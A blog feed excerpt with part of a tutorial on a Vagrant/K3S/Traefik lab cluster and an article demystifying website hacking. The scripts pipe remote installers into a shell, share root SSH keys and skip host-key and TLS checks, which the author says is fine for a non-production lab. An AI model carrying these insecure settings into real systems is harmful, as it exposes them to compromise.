cat /root/.ssh/id_rsa.pub &gt;&gt; /root/.ssh/authorized_keys
chmod 400 /root/.ssh/authorized_keys
chown root:root /root/.ssh/authorized_keys

# Add current node in  /etc/hosts
echo &quot;127.0.1.1 $(hostname)&quot; &gt;&gt; /etc/hosts

# Get current IP adress to launch k3S
current_ip=$(/sbin/ip -o -4 addr list enp0s8 | awk &apos;{print $4}&apos; | cut -d/ -f1)

# If we are on first node, launch k3s with cluster-init, else we join the existing cluster
if [ $(hostname) = &quot;kubemaster1&quot; ]
then
    curl -sfL https://get.k3s.io | INSTALL_K3S_EXEC=&quot;server --cluster-init --tls-san $(hostname) --bind-address=${current_ip} --advertise-address=${current_ip} --node-ip=${current_ip} --no-deploy=traefik&quot; sh -
else
    echo &quot;10.0.0.11  kubemaster1&quot; &gt;&gt; /etc/hosts
    scp -o StrictHostKeyChecking=no root@kubemaster1:/var/lib/rancher/k3s/server/token /tmp/token
    curl -sfL https://get.k3s.io | INSTALL_K3S_EXEC=&quot;server --server https://kubemaster1:6443 --token-file /tmp/token --tls-san $(hostname) --bind-address=${current_ip} --advertise-address=${current_ip} --node-ip=${current_ip} --no-deploy=traefik&quot; sh -
fi

# Wait for node to be ready and disable deployments on it
sleep 15
kubectl taint --overwrite node $(hostname) node-role.kubernetes.io/master=true:NoSchedule
</code></pre><!--kg-card-end: html--><p>Once again, let&apos;s cut out this script :</p><ul><li>Lines 4 to 11: We deploy our SSH key and add it as an authorized host.</li><li>Line 19 to 27: If we are on the node &quot;kubemaster1&quot;, we launch a cluster-init, otherwise we join the existing cluster.</li><li>Lines 30 and 31: we wait 15 seconds for the node to be functional, then we &quot;taint&quot; it to indicate that the node should not execute pods. In fact, by default, since K3S is designed to work on small systems, the master runs in standalone mode and can also execute pods.</li></ul><p>Note also that I disable the installation of Traefik, indeed, our nodes being masters, they are not supposed to run an Ingress Controller.</p><h3 id="execution-nodes">Execution nodes</h3><p>In the same way, let&apos;s look at the contents of the VagrantFile as far as our execution nodes are concerned.</p><!--kg-card-begin: html--><pre class="language-hcl line-numbers"><code>MASTER_COUNT = 3
IMAGE = &quot;ubuntu/bionic64&quot;

...

Vagrant.configure(&quot;2&quot;) do |config|

...

  (1..NODE_COUNT).each do |i|
    config.vm.define &quot;kubenode#{i}&quot; do |kubenodes|
      kubenodes.vm.box = IMAGE
      kubenodes.vm.hostname = &quot;kubenode#{i}&quot;
      kubenodes.vm.network  :private_network, ip: &quot;10.0.0.#{i+20}&quot;
      kubenodes.vm.provision &quot;file&quot;, source: &quot;./.ssh/id_rsa.pub&quot;, destination: &quot;/tmp/id_rsa.pub&quot;
      kubenodes.vm.provision &quot;file&quot;, source: &quot;./.ssh/id_rsa&quot;, destination: &quot;/tmp/id_rsa&quot;
      kubenodes.vm.provision &quot;shell&quot;, privileged: true,  path: &quot;scripts/node_install.sh&quot;
    end
  end

...

end
</code></pre><!--kg-card-end: html--><p>As you can see, the content is pretty much the same as for the masters.</p><p>So the only differences are :</p><ul><li>The IP pool, we are this time between 10.0.0.21 and 10.0.0.23</li><li>The script executed for provisioning</li></ul><p>Let&apos;s take a look at provisioning:</p><!--kg-card-begin: html--><pre class="language-bash line-numbers"><code>#!/bin/sh

# Deploy keys to allow all nodes to connect each others as root
mv /tmp/id_rsa*  /root/.ssh/

chmod 400 /root/.ssh/id_rsa*
chown root:root  /root/.ssh/id_rsa*

cat /root/.ssh/id_rsa.pub &gt;&gt; /root/.ssh/authorized_keys
chmod 400 /root/.ssh/authorized_keys
chown root:root /root/.ssh/authorized_keys

# Add current node in  /etc/hosts
echo &quot;127.0.1.1 $(hostname)&quot; &gt;&gt; /etc/hosts

# Add kubemaster1 in  /etc/hosts
echo &quot;10.0.0.11  kubemaster1&quot; &gt;&gt; /etc/hosts

# Get current IP adress to launch k3S
current_ip=$(/sbin/ip -o -4 addr list enp0s8 | awk &apos;{print $4}&apos; | cut -d/ -f1)

# Launch k3s as agent
scp -o StrictHostKeyChecking=no root@kubemaster1:/var/lib/rancher/k3s/server/token /tmp/token
curl -sfL https://get.k3s.io | INSTALL_K3S_EXEC=&quot;agent --server https://kubemaster1:6443 --token-file /tmp/token --node-ip=${current_ip}&quot; sh -
</code></pre><!--kg-card-end: html--><p>This time we have a much simpler script!</p><p>The first part always consists of deploying our SSH keys.</p><p>So the last line launches K3S in &quot;agent&quot; mode by telling it to connect to the kubemaster1 node (I chose this node arbitrarily, any of the 3 masters would have done).</p><h3 id="load-balancer-frontend-traefik">Load balancer frontend: Traefik</h3><p>Finally, we deploy our front load balancer.</p><p>This installation is very basic, since we have no production constraints, the need is not to be as secure as a productive environment, but simply to have a load balancer to reproduce the normal behavior of a Kubernetes cluster.</p><p>On the Vagrant side, we are still very basic:</p><!--kg-card-begin: html--><pre class="language-hcl line-numbers"><code>MASTER_COUNT = 3
IMAGE = &quot;ubuntu/bionic64&quot;

...

Vagrant.configure(&quot;2&quot;) do |config|

...

  config.vm.define &quot;front_lb&quot; do |traefik|
      traefik.vm.box = IMAGE
      traefik.vm.hostname = &quot;traefik&quot;
      traefik.vm.network  :private_network, ip: &quot;10.0.0.30&quot;   
      traefik.vm.provision &quot;file&quot;, source: &quot;./scripts/traefik/dynamic_conf.toml&quot;, destination: &quot;/tmp/traefikconf/dynamic_conf.toml&quot;
      traefik.vm.provision &quot;file&quot;, source: &quot;./scripts/traefik/static_conf.toml&quot;, destination: &quot;/tmp/traefikconf/static_conf.toml&quot;
      traefik.vm.provision &quot;shell&quot;, privileged: true,  path: &quot;scripts/lb_install.sh&quot;
      traefik.vm.network &quot;forwarded_port&quot;, guest: 6443, host: 6443
  end
end
</code></pre><!--kg-card-end: html--><p>This time, no SSH key, we rather push the Traefik configuration that I will describe below.</p><p>Then, we run the installation. In addition, we indicate to map port 6443 of the host (my machine) to 6443 of the virtual machine. This will allow me to run kubectl commands from my host through Traefik.</p><p>For Traefik, we have two configuration files :</p><ul><li>The static configuration: This is the basic configuration of Traefik, this is where we will indicate the listening port for example</li><li>The dynamic configuration: This is where you will find the information that Traefik can collect on the fly, including the configuration of the endpoints.</li></ul><p>Let&apos;s see our configuration.</p><p>Static configuration :</p><!--kg-card-begin: html--><pre class="language-toml line-numbers"><code>[entryPoints]
  [entryPoints.websecure]
    address = &quot;:6443&quot;
    [entryPoints.websecure.http.tls]
      [[entryPoints.websecure.http.tls.domains]]
        main = &quot;10.0.0.30&quot;

[providers.file]
  directory = &quot;/tmp/traefikconf/&quot;

[serversTransport]
  insecureSkipVerify = true
</code></pre><!--kg-card-end: html--><p>So we can see :</p><ul><li>That I listen in https on 6443 (default port of Kubernetes)</li><li>I then indicate in which directory my dynamic configuration is located.</li><li>I indicate not to check the certificate; indeed, my K3S server uses a self-signed certificate by default.</li></ul><p>Then, the dynamic configuration, this is where I will define my endpoints. Note that any modification of this one is taken into account by Traefik instantly.</p><!--kg-card-begin: html--><pre class="language-toml line-numbers"><code>[http]

  [http.routers]
    [http.routers.routerTest]
      service = &quot;k3s&quot;
      rule = &quot;Host(`10.0.0.30`)&quot;

  [http.services]
    [http.services.k3s]
      [http.services.k3s.loadBalancer]
        [[http.services.k3s.loadBalancer.servers]]
          url = &quot;https://10.0.0.11:6443&quot;
        [[http.services.k3s.loadBalancer.servers]]
          url = &quot;https://10.0.0.12:6443&quot;
        [[http.services.k3s.loadBalancer.servers]]
          url = &quot;https://10.0.0.13:6443&quot;
</code></pre><!--kg-card-end: html--><p>Nothing original here either. First, I define a Traefik k3s service, to which I say to send any request that arrives with the host &quot;10.0.0.30&quot; (the IP address I set to Vagrant).</p><p>Then I define a load balancing on the 3 Kubernetes masters. Traefik&apos;s default behavior is the &quot;round robin&quot; mode, which means that it will send requests on each node one after the other, regardless of a possible load.</p><p>Finally, let&apos;s have a look at the installation shell script :</p><!--kg-card-begin: html--><pre class="language-bash line-numbers"><code>#!/bin/sh
# Download and deploy Traefik as a front load balancer
curl https://github.com/containous/traefik/releases/download/v2.2.11/traefik_v2.2.11_linux_amd64.tar.gz -o /tmp/traefik.tar.gz -L
cd /tmp/
tar xvfz ./traefik.tar.gz
nohup ./traefik --configFile=/tmp/traefikconf/static_conf.toml &amp;&gt; /dev/null&amp;
</code></pre><!--kg-card-end: html--><p>This is the simplest of the three scripts. As you can see, I directly download the Traefik binary (version 2.2.11), because Traefik is also a standalone binary written in GO.</p><p>Then, I launch Traefik by detaching it from the terminal and simply telling it where its static configuration file is.</p><h2 id="it-s-time-to-launch-all-this-">It&apos;s time to launch all this!</h2><p>You can find all the code used in GitHub :</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/teddy-ferdinand/vagrant-k3s-cluster?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">teddy-ferdinand/vagrant-k3s-cluster</div><div class="kg-bookmark-description">D&#xE9;ploiement d&#x2019;une infrastructure K3S avec Vagrant. Contribute to teddy-ferdinand/vagrant-k3s-cluster development by creating an account on GitHub.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.githubassets.com/favicons/favicon.svg" alt="Create a local Kubernetes cluster with Vagrant"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">teddy-ferdinand</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://avatars0.githubusercontent.com/u/49089780?s=400&amp;v=4" alt="Create a local Kubernetes cluster with Vagrant"></div></a></figure><h3 id="install-vagrant">Install Vagrant</h3><p>First we need to install Vagrant.</p><p>Here we have several solutions available:</p><p>Installation via the package manager: Often the simplest solution under Linux, not all distributions have Vagrant and it should be noted that the version can sometimes be (very) late on the official site. For my part, this is the installation I did.<br>Standalone binary : Vagrant is a standalone binary written in GO, it is also <a href="https://www.vagrantup.com/downloads?ref=en.tferdinand.net">available on the official website</a>, you can also install it this way.<br>These two installations won&apos;t change anything afterwards, so choose the one that suits you best.</p><h3 id="launch-deployment">Launch deployment</h3><p>Once Vagrant is installed, go to the root directory, where our VagrantFile is located. So we should have a structure similar to this one:</p><figure class="kg-card kg-image-card"><img src="https://tferdinand.net/content/images/2020/09/image-2.png" class="kg-image" alt="Create a local Kubernetes cluster with Vagrant" loading="lazy" width="367" height="206"></figure><p>We can now launch the deployment with a simple</p><!--kg-card-begin: html--><pre class="language-bash"><code>vagrant up
</code></pre><!--kg-card-end: html--><p>You should normally see the deployment begin, with the download of the Ubuntu box.</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://tferdinand.net/content/images/2020/09/image-3.png" class="kg-image" alt="Create a local Kubernetes cluster with Vagrant" loading="lazy" width="991" height="307"></figure><p>From there, full deployment will take about 10 minutes.</p><h3 id="connect-to-our-cluster">Connect to our cluster</h3><p>Once the deployment is complete, Vagrant normally gives you back your hand.</p><p>All we have to do is configure the Kubernetes client on our workstation.</p><p>I left a little script that will allow you to download kubectl, and configure it to connect to our cluster, without touching any configuration already present on the host.</p><p>Here is its content :</p><!--kg-card-begin: html--><pre class="language-bash line-numbers"><code>#!/bin/sh

# Get kubectl
curl -L https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl -o /tmp/kubectlvagrant
chmod +x /tmp/kubectlvagrant

# Get password from master config file
PASSWORD=$(vagrant ssh kubemaster1 -c &quot;sudo grep password /etc/rancher/k3s/k3s.yaml&quot; | awk -F&apos;:&apos; &apos;{print $2}&apos; | sed &apos;s/ //g&apos;)

#Create kubectl config
cat &lt;&lt; EOF &gt; /tmp/kubectlvagrantconfig.yml
apiVersion: v1
clusters:
- cluster:
    server: https://10.0.0.30:6443
    insecure-skip-tls-verify: true
  name: default
contexts:
- context:
    cluster: default
    user: default
  name: default
current-context: default
kind: Config
preferences: {}
users:
- name: default
  user:
    password: ${PASSWORD}
    username: admin
EOF

# Create temp vars to use kubectl with vagrant
export KUBECONFIG=/tmp/kubectlvagrantconfig.yml
alias kubectl=&quot;/tmp/kubectlvagrant&quot;
</code></pre><!--kg-card-end: html--><p>As you can see, this script will :</p><ul><li>Download the kubectl client and place it in /tmp/kubectlvagrant making it executable.</li><li>Then, we will retrieve the admin login password of Kubernetes.</li><li>We then insert this password in a kubeconfig configuration template. We will note the &quot;insecure-skip-tls-verify&quot; parameter which indicates to ignore the certificate, because once again we are on a certificate self-signed by Traefik. The back end is my virtual machine with Traefik.</li><li>Finally, I create an environment variable to tell kubectl where to get its configuration and an alias for kubectl to point to the one we downloaded.</li></ul><p>To use this script, you just have to source it</p><!--kg-card-begin: html--><pre class="language-bash"><code>source ./scripts/configure_kubectl.sh
</code></pre><!--kg-card-end: html--><p><strong>Be careful not to execute the script, aliases and export would not work, you have to source it well.</strong></p><p>To go back to the initial state, just reopen a new terminal.</p><h3 id="it-s-time-to-test-our-cluster-">It&apos;s time to test our cluster!</h3><p>Once our script is executed, let&apos;s try to see our nodes.</p><!--kg-card-begin: html--><pre class="language-bash"><code>kubectl get nodes -o wide
</code></pre><!--kg-card-end: html--><figure class="kg-card kg-image-card kg-width-full"><img src="https://tferdinand.net/content/images/2020/09/image-4.png" class="kg-image" alt="Create a local Kubernetes cluster with Vagrant" loading="lazy" width="1257" height="254"></figure><p><em>It is possible that this request may take a little longer than normal since the cluster receives its first connection.</em></p><p>This is good news! We have our 3 masters and 3 execution nodes!</p><p>We&apos;re going to do a little basic test, namely to deploy a 3 Nginx pod.</p><!--kg-card-begin: html--><pre class="language-bash"><code>kubectl apply -f https://raw.githubusercontent.com/kubernetes/website/master/content/fr/examples/controllers/nginx-deployment.yaml
</code></pre><!--kg-card-end: html--><p>Checking the deployed pods, we see 3 pods: 1 on each of our Kubernetes runtime nodes.</p><!--kg-card-begin: html--><pre class="language-bash"><code>kubectl get pods -o wide
</code></pre><!--kg-card-end: html--><figure class="kg-card kg-image-card kg-width-full"><img src="https://tferdinand.net/content/images/2020/09/image-5.png" class="kg-image" alt="Create a local Kubernetes cluster with Vagrant" loading="lazy" width="1264" height="146"></figure><p>After about 30 seconds, they will go into &quot;running&quot;.</p><p>As you can see, you can now use Kubernetes in a similar way to a production server.</p><p>Once you don&apos;t need the cluster anymore, you can destroy it with a simple</p><!--kg-card-begin: html--><pre class="language-bash"><code>vagrant destroy -f
</code></pre><!--kg-card-end: html--><p>After a minute, all your machines are now destroyed.</p><figure class="kg-card kg-image-card"><img src="https://tferdinand.net/content/images/2020/09/image-6.png" class="kg-image" alt="Create a local Kubernetes cluster with Vagrant" loading="lazy" width="468" height="270"></figure><h2 id="to-conclude">To conclude</h2><p>As you can see, Vagrant makes it easy to create work environments, which makes application development or testing easier.</p><p>I also chose to use Traefik as a load balancer to show that there is also a Traefik binary. Indeed, we often talk about its Docker image, but it is above all a binary in GO.</p><p>Similarly, it is quite easy to create coherent infrastructures using Vagrant to reproduce a production environment.</p><p>The advantages are those I mentioned before:</p><ul><li>It&apos;s fast (10 minutes to create a complete cluster)</li><li>It doesn&apos;t cost anything, since the host is your machine.</li><li>It is easily transmitted, for example within a team.</li></ul><p>If you want to know more about Vagrant, I recommend the Xavki YouTube playlist which explores the tool well [French Link]:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.youtube.com/playlist?list=PLn6POgpklwWr3ADWfGJOC9jf8k6it3Ra8&amp;ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">TUTORIALS VAGRANT - EXEMPLES</div><div class="kg-bookmark-description">Quelques exemples utiles pour apprendre &#xE0; utiliser vagrant</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://www.youtube.com/s/desktop/4eb4dcc1/img/favicon_144.png" alt="Create a local Kubernetes cluster with Vagrant"><span class="kg-bookmark-author">YouTube</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://i.ytimg.com/vi/adR2EYm4gWQ/hqdefault.jpg?sqp=-oaymwEWCKgBEF5IWvKriqkDCQgBFQAAiEIYAQ==&amp;rs=AOn4CLCTFOAcA6oR3oeMDS8qKrBmTUifBw" alt="Create a local Kubernetes cluster with Vagrant"></div></a></figure><p>If you want to learn more about K3S, you can find content on the WeScale blog [French Link]:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://blog.wescale.fr/tag/k3s/?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">k3s - Le blog des experts WeScale - DevOps, Cloud et passion</div><div class="kg-bookmark-description"></div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://blog.wescale.fr/favicon.png" alt="Create a local Kubernetes cluster with Vagrant"><span class="kg-bookmark-author">Le blog des experts WeScale - DevOps, Cloud et passion</span><span class="kg-bookmark-publisher">Romain BOULANGER</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://blog.wescale.fr/content/images/2016/04/logo-wescale.png" alt="Create a local Kubernetes cluster with Vagrant"></div></a></figure><p>As always, feel free to comment! What do you think of Vagrant + K3S to have a local Kubernetes cluster?</p>]]></content:encoded></item><item><title><![CDATA[Being a hacker isn't like being in the movies!]]></title><description><![CDATA[<p>Hackers &#x2026; we often see them in movies and TV shows. These experts are able to hijack NSA satellites with a string and a nail clipper (#MacGyver)! (Cover image from the movie Die hard 4)</p><p>I decided today to tell you about hacking in &quot;real life&quot;. I consider</p>]]></description><link>https://en.tferdinand.net/being-a-hacker-isnt-like-being-in-the-movies/</link><guid isPermaLink="false">6337ff9a65fbc6000155a564</guid><category><![CDATA[Security]]></category><category><![CDATA[fullcover]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Sun, 23 Aug 2020 18:19:46 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2020/08/OEcWr.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2020/08/OEcWr.jpg" alt="Being a hacker isn&apos;t like being in the movies!"><p>Hackers &#x2026; we often see them in movies and TV shows. These experts are able to hijack NSA satellites with a string and a nail clipper (#MacGyver)! (Cover image from the movie Die hard 4)</p><p>I decided today to tell you about hacking in &quot;real life&quot;. I consider myself to be a white hat (an ethical hacker) and I&#x2019;m going to tell you about the common methods a hacker uses. I will focus here on the simplest part: websites.</p><p>Spoiler alert: you may be disappointed, many methods are very simple.</p><!--kg-card-begin: html--><div style="background:red; color:white; padding:10px;"><h4>Important warning</h4><br>
The purpose of this post is not to promote hacking, but to demystify it and show a little bit what hacking is in real life. Don&apos;t get into hacking without knowing what you&apos;re doing and without taking the necessary precautions.<br>
Hacking is considered a misdemeanor or a crime depending on the country. For information, in France, &quot;Article 323-1 of the penal code punishes &quot;the fact of accessing or remaining fraudulently, in all or part of an automated processing system&quot;. The penalty incurred is 2 years imprisonment and a &#x20AC;30,000 fine. This can be increased to 3 years imprisonment and a 45000&#x20AC; fine when it results in &quot;either the deletion or modification of data contained in the system, or an alteration of the functioning of this system&quot;.
</div><!--kg-card-end: html--><h2 id="hack-what-for">Hack, what for?</h2><p>Before talking about method and vector of attack, the right question is why hack?</p><p>To answer this question, there are, from my point of view, 2 sides of the same coin to consider, both types of hackers.</p><p>The white hat will try to find a loophole to signal it. Yes, but why report it?</p><ul><li>By conviction, personally I have already found major security holes by altruism, I&#x2019;m in favor of a safer web for everyone.</li><li>Because he participates in bounty bugs and will therefore receive a reward for reporting flaw (subject to certain criteria, such as non-disclosure within x days)</li><li>By challenge, I am also in this case, the challenge to break, to bypass the security. The pleasure of solving puzzles more or less complex&#x2026;</li></ul><p>The black hat, on the other hand, will try to take advantage of his loophole. There are several solutions for that:</p><ul><li>Extract information and resell it on the black market. For example, an enriched contact (email address, password, phone number, first and last name) can sell for a few cents. Taking into account that many sites have thousands or even millions of contacts in their database, the price rises quickly.</li><li>Selling confidential information or trade secrets</li><li>Sell credit card/PayPal information, and so on&#x2026;</li><li>Making a site unavailable. Some offer DDOS &quot;as a service&quot;, allowing for example to temporarily shut down a competitor to discredit it.</li><li>Requesting ransom after encrypting all the data of a company or individual</li><li>Turn the machine into a zombie, used in a botnet or for phishing emails.</li></ul><p>The purpose of this article is not to be exhaustive, but to tell you the main reasons.</p><h2 id="observe-to-break-better">Observe to break better</h2><figure class="kg-card kg-image-card kg-width-full kg-card-hascaption"><img src="https://tferdinand.net/content/images/2020/08/image-2.png" class="kg-image" alt="Being a hacker isn&apos;t like being in the movies!" loading="lazy"><figcaption>Matrix, mess and multiple monitors/keyboards</figcaption></figure><p>We often talk about incredible hacks, but we often forget to talk about more basic hacks. I had the opportunity to get past the security of some websites simply by being an observer. For example, recently I managed to access very sensitive data on a website simply because of a display problem.</p><p>Indeed, one of the images had loaded badly, and I had the reflex of the good old CTRL+U (Display Source)!</p><p>What was not my surprise when I saw PHP errors, whose HTML rendering had been hidden&#x2026; Then by going back to those errors, I discovered a debug module enabled on this production environment.</p><figure class="kg-card kg-image-card kg-width-full kg-card-hascaption"><img src="https://tferdinand.net/content/images/2020/08/image-7.png" class="kg-image" alt="Being a hacker isn&apos;t like being in the movies!" loading="lazy"><figcaption>Visible content (extract from the email sent to the security team and the company&#x2019;s DPO)</figcaption></figure><p>Via this debug module, I was able to trace the site configuration files, in which there were database connection strings, FTP server connection information and many other information, including confidential information.</p><p>This is just an example, but be aware that there are many such cases. Observing the source code or the behavior of a site gives clues on how to tamper with its operation. It is also possible to observe the behavior of the application using the development tools (F12). This makes it possible to observe XHR-type calls, which often correspond to API calls, when the latter are not sufficiently protected. It is sometimes possible to have them display data from other clients or information that is supposed to be protected.</p><p>In one of my previous missions, I had put my finger on a security anomaly of this type, by modifying an API call, I was able to access all the information of all the clients registered in the database (we were talking about several million clients in this case). Fortunately, I had identified this bug on a pre-production environment, and the bug was fixed before going into production.</p><p>A lot of hacking is in fact done by opportunism, simply because a flaw was visible. Surface attack remains the most common method!</p><h2 id="knowledge-is-power"><strong>Knowledge is power</strong></h2><figure class="kg-card kg-image-card kg-width-full kg-card-hascaption"><img src="https://tferdinand.net/content/images/2020/08/image-3.png" class="kg-image" alt="Being a hacker isn&apos;t like being in the movies!" loading="lazy"><figcaption>Mr. Robot, finally a show where hacking is realistic.</figcaption></figure><p>Observing is good, knowing is just as useful. To know is to know several things:</p><ul><li>Knowing the target: being able to identify the CMS used, for example, or the type of server that runs the site.</li><li>Know the common flaws</li><li>Some common attack vectors: XHR, SQL Injection, etc.</li></ul><p>Why is this important? As a demonstration, if I want to try to brute force a site, knowing if I&apos;m on a WordPress or Drupal type CMS changes a lot, I&apos;m not going to attack both in the same way.</p><p>Moreover, I&apos;m going to try to look for the latest security patches to attack what they fix. In production, it is common for servers not to be updated as soon as a patch is released (except for big security patches announced by the editor beforehand).</p><p>In the same way, knowing that a server is running on an obsolete version of Apache HTTPD (for example once again) allows me to know how I can compromise it to potentially take control of it.</p><p>In the world of hacking, technology watch is essential. You need to keep up to date with the latest major vulnerabilities, the latest methods, and the most common techniques.</p><p>For example, Amazon recently suffered an attack of several Tb per second. Everyone has been focusing on volume, yet on the scale of AWS, it&apos;s a grain of sand. What is interesting is to understand the attack vector: the UDP reflecting. Indeed, knowing how someone generated such a bandwidth is much more useful than a &quot;clickbait&quot; volume.</p><h2 id="the-right-tool-for-the-right-attack">The right tool for the right attack</h2><p>Of course I will not expose here all the tools to make an attack, that&apos;s not the point, I will just talk about common tools that can be used quite easily.</p><h3 id="detection-of-cms-solutions-used">Detection of CMS/solutions used</h3><p>I&apos;d already be talking about the <a href="https://www.wappalyzer.com/?ref=en.tferdinand.net">Wappalyzer </a>extension. This browser extension allows you to have a lot of information at a glance, simply based on the headers and the presence of certain key files. Here is an example of this site:</p><figure class="kg-card kg-image-card kg-width-full"><img src="https://tferdinand.net/content/images/2020/08/image-1.png" class="kg-image" alt="Being a hacker isn&apos;t like being in the movies!" loading="lazy"></figure><h3 id="preparing-your-attack">Preparing your attack</h3><p>Here I see the undisputed master, I have named the one, the only, the great MetaSploit. This program, which can be used for free, allows exploiting payloads or to create one&apos;s own to exploit known flaws. An article about how to use the tool will soon arrive on this blog!</p><figure class="kg-card kg-image-card kg-width-wide"><img src="https://tferdinand.net/content/images/2020/08/image-6.png" class="kg-image" alt="Being a hacker isn&apos;t like being in the movies!" loading="lazy"></figure><h3 id="be-the-least-visible-on-the-internet">Be the least visible on the Internet</h3><p>I think everybody expects it, but for me, I can hardly see being more effective than Tor at this point. Why Tor instead of VPN? Most VPN providers log your activity, and even if they sell you the fact that they don&apos;t, you can never be 100% sure.</p><p>As far as tor is concerned, there are some reliable alternatives for me:</p><ul><li><a href="https://www.torproject.org/download/?ref=en.tferdinand.net">Tor browser</a>: the official Tor browser based on Firefox.</li><li><a href="https://brave.com/?ref=en.tferdinand.net">Brave</a>: The privacy-oriented browser, which has a Tor mode (a solution I personally use)</li></ul><p>Note that tor is automatically blocked on some sites, just like VPNs.</p><h3 id="analyzing-network-behavior">Analyzing network behavior</h3><p>Analyzing the network behavior can also be a good approach, for that, the most adapted tool is, in my opinion, the TCPDump/WireShark combo. On Windows, you can use netsh or Microsoft powertools.</p><p>The interest in this kind of case can be to see with which server we communicate, which information we send and receive and according to which protocol.</p><h3 id="have-a-toolbox-os-">Have a &quot;toolbox&quot; OS.</h3><figure class="kg-card kg-image-card kg-width-full kg-card-hascaption"><img src="https://tferdinand.net/content/images/2020/08/image-4.png" class="kg-image" alt="Being a hacker isn&apos;t like being in the movies!" loading="lazy"><figcaption>Secret in their eyes, let&apos;s add even more screens and keyboards, I don&apos;t know many hackers who leave their PC open like that and take so little care of it!</figcaption></figure><p>For the lazy (as I am), it is also possible to directly exploit an OS. I see two candidates here:</p><p><a href="https://www.kali.org/?ref=en.tferdinand.net">Kali Linux</a>: The Debian-based OS is recognized in the cyber security community, the &quot;by offensive security&quot; model has nothing to prove. It has the advantage of having a big community of enthusiasts who feed it and put a lot of tutorials around it. For my part, it&apos;s my main Linux.</p><p><a href="https://parrotlinux.org/?ref=en.tferdinand.net">Parrot Linux</a>: Distribution also based on Debian. This distribution has the same advantages as Kali, a ready-made packaging, a strong community. I just find that the community around the product is a bit less present (but that&apos;s just my point of view, I may be wrong).</p><p>Note that the two Linux mentioned above are about the same age. They were both released in 2013.</p><h2 id="attackers-everywhere-what-to-do">Attackers everywhere, what to do?</h2><p>I&apos;ve already said it several times during my missions, when I&apos;m asked how to avoid being attacked, the answer is simple: it&apos;s impossible!</p><p>The Internet is a jungle, there&apos;s not much you can do about it.</p><p>The best solution remains surveillance and reactivity. You have to keep in mind that black hats will often remain discreet until they can launch their attacks, they can wait months before showing up. The goal in this case is to accumulate as much information as possible, or to infiltrate as far as possible into the information system.</p><p>Similarly, many attackers will not launch an attack at 3 Gb/second, which would only be of interest to be very visible.</p><p>So what do we do? Personally, I see three axes:</p><ul><li><strong>Metrology and supervision</strong>: finely supervising a production infrastructure is essential, it allows us to detect abnormal behavior, the more information and hindsight we have, the easier it is to detect patterns that are out of the ordinary.</li><li><strong>Regularly auditing applications</strong>: at this point, I am not necessarily talking about using an external company to audit security, but rather about auditing the authorizations, the open flows of an application yourself. Is it still necessary for my application A to access application B? Does it need to have as much access, to see when the last uses were made, and so on?</li><li><strong>Test as much as possible</strong>: I already talked about it on this blog, DevSecOps must become the basis of your applications, testing security as soon as your application is developed is <strong>essential</strong>.</li></ul><p>The most complicated will always remain to detect weak signals, i.e., discrete attacks. I have 2 examples in mind on this subject:</p><ul><li>A &quot;brute force&quot; attack on ADFS, via a botnet network, which made 5 attempts per minute, therefore lost in the &quot;normal&quot; flow of several hundreds or even thousands of connections over the same interval.</li><li>A compromised machine that was infected by a cryptographer, who was mining Bitcoin using 10% of the CPU.</li></ul><p>It is also possible to equip yourself accordingly. On AWS, the GuardDuty service does an excellent job of detecting this type of behavior.</p><p>As said earlier, a malicious attacker will always try to be as discreet as possible.</p><figure class="kg-card kg-image-card kg-width-full kg-card-hascaption"><img src="https://tferdinand.net/content/images/2020/08/image-5.png" class="kg-image" alt="Being a hacker isn&apos;t like being in the movies!" loading="lazy"><figcaption>Criminal minds, no less than 9 screens for Garcia.</figcaption></figure><h3 id="to-pay-the-ransom-or-not">To pay the ransom or not?</h3><p>Lately, a ransomware attack got a lot of attention. Garmin was indeed targeted by a cryptolocker and has been immobilized for over ten days. Looks like the company ultimately decided to pay the ransom.</p><p>$10,000,000 is the ransom price&#x2026; Like the debit story, the amount is anecdotal for a company Garmin&apos;s size.</p><p>Still, from where I stand, paying ransom is always a bad idea:</p><p>We&apos;re talking about hackers, they have absolutely no obligation to unlock the data<br>If Garmin decided to pay today, what&apos;s to stop another company from doing so?<br>It is possible that another backdoor will be present in the system and lock again the company in a few months.<br>Paying encourages these attacks because it sends a signal that it&apos;s an effective way to make money.</p><h2 id="to-conclude-this-long-article-">To conclude this long article&#x2026;</h2><p>Rather than a conclusion as long as this article, I propose bullet points on the misconceptions about hacking:</p><ul><li>Hackers don&apos;t need 15 monitors and 8 computers&#x2026;</li><li>Hackers very rarely hack from mobile phones, at best it is used as an attack vector.</li><li>Hacking a system is not done in a few seconds (except in very special cases), and sometimes takes several weeks or months.</li><li>Social hacking is also a more and more common way to get in, as I have talked about it in the past.</li><li>In movies and series, hacking is often used in Deus Ex Machina to avoid having to manage a too complicated story, computer science is often seen as an end and not a tool.</li><li>Most of the movies and series that have hacking scenes often make me laugh (except Mr. Robot which is devilishly realistic).</li><li>I don&apos;t dress in a hoodie to hack into systems</li><li>Hackers are not all outcasts of the system and many go unnoticed, they just decided to play with their rules on the Internet.</li></ul><p>If you want to train without risk (and without the risk of jail), I can only recommend the excellent <a href="https://www.hackthebox.eu/?ref=en.tferdinand.net">hackthebox </a>that will allow you to use your skills and sharpen your hacker talents. This site provides sandbox environments for hackers. Please note that you will need to &quot;hack&quot; the site in order to create an account.</p>]]></content:encoded></item><item><title><![CDATA[AWS IAM: Between dream and 